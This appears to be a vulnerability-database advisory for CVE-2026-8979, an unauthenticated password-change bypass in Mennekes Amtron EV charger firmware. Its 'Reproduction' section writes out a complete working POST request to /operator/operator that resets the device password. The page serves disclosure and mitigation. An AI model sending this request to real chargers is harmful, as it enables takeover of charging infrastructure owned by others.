CVE-2026-8979
Description
The Mennekes Amtron series (firmware versions ≤ 5.22.3) is vulnerable to an authentication bypass. An unauthenticated remote attacker can change the password of the user account via a crafted POST request to the /operator/operator endpoint.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Authentication bypass in Mennekes Amtron series firmware ≤5.22.3 allows unauthenticated remote change of user password via crafted POST request.
Vulnerability
The Mennekes Amtron series (including Amtron Professional, Amtron Professional (Eichrecht), Amedio Professional, Amtron Charge Control, Amtron Professional Twincharge, and Smart-T PnC) with firmware versions ≤5.22.3 is vulnerable to an authentication bypass. The /operator/operator endpoint accepts a crafted POST request without authentication, allowing an attacker to change the user account password [1].
Exploitation
An unauthenticated remote attacker can send a POST request to /operator/operator with the parameter UserPwdPlain_custom set to a desired password. No prior authentication or user interaction is required [1]. The request does not require any special headers beyond standard HTTP POST fields.
Impact
Successful exploitation allows the attacker to change the user password, gaining unauthorized access to the device. This can lead to full device takeover, loss of control over the charging infrastructure, and potential disruption of EV charging services [1].
Mitigation
No official fix or firmware update has been released by Mennekes as of the publication date of the reference [1]. Until a patch is available, operators should restrict network access to the device and monitor for unauthorized requests to the /operator/operator endpoint.
AI Insight generated on May 28, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1- Range: <=5.22.3
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing authentication check on the password-change endpoint allows any unauthenticated remote attacker to overwrite the user account password."
Attack vector
An unauthenticated remote attacker sends a crafted POST request to the `/operator/operator` endpoint with the parameter `UserPwdPlain_custom` set to a new password value [ref_id=1]. The endpoint does not require any authentication or authorization check before processing the password change. The attacker can then use the newly set password to log in as the user account and gain access to the device. The advisory provides a proof-of-concept showing the request is sent over HTTP with no authentication headers [ref_id=1].
Affected code
The vulnerability exists in the `/operator/operator` endpoint of the Mennekes Amtron series web interface. The advisory does not specify a particular source file or function name, but the endpoint accepts a `UserPwdPlain_custom` parameter via POST request to change the user account password [ref_id=1].
What the fix does
The advisory does not include a patch or vendor fix. The recommended remediation is to restrict the `/operator/operator` endpoint so that password changes require prior authentication, and to validate that the requesting session is authorized to modify the target account [ref_id=1]. Without such controls, any unauthenticated party can overwrite the user password.
Preconditions
- networkThe attacker must have network access to the Mennekes Amtron device's web interface.
- authNo authentication or session token is required.
Reproduction
Send the following POST request to the target device, replacing the Host IP as needed:
``` POST /operator/operator HTTP/1.1 Host: 10.201.74.66 Content-Type: application/x-www-form-urlencoded Content-Length: 24
UserPwdPlain_custom=asdf ```
After the request succeeds, log in to the web interface using the user account with the new password "asdf" [ref_id=1].
Generated on May 28, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.